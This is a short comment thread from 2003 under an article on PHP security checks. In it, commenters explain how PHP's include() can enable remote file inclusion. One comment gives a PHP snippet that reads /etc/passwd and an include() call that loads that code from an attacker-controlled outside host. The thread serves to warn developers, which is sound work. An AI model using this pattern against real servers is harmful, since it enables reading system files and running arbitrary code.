Women in Technology

Hear us Roar



Article:
  Ten Security Checks for PHP, Part 1
Subject:   Not the kind of article i would expect from o'reilly!
Date:   2003-03-29 05:08:06
From:   anonymous2
Response to: Not the kind of article i would expect from o'reilly!

Include *can* harm o your server, read the comments in the PHP documentation before you spread misinformation:


http://www.php.net/manual/en/function.include.php

Main Topics Oldest First

Showing messages 1 through 1 of 1.

  • Not the kind of article i would expect from o'reilly!
    2003-05-23 00:10:42  clancymalcolm [View]

    To further clarify how include(...) can harm your own server...

    I can upload a file to my webserver called crack.txt that contains the following:
    <?php
    readfile("/etc/passwd");
    ?>

    Notice that this is a .txt file - my web server won't execute the PHP code contained in the file.

    Now if I can make YOUR web server run the code
    include("http://www.mywebserver.com/crack.txt");

    Then YOUR web server will show me it's /etc/passwd file. Of course I could have done almost anything else in my source code - delete files, run other programs, etc - almost anything that the web server's user account has permissions to do.

    Clancy.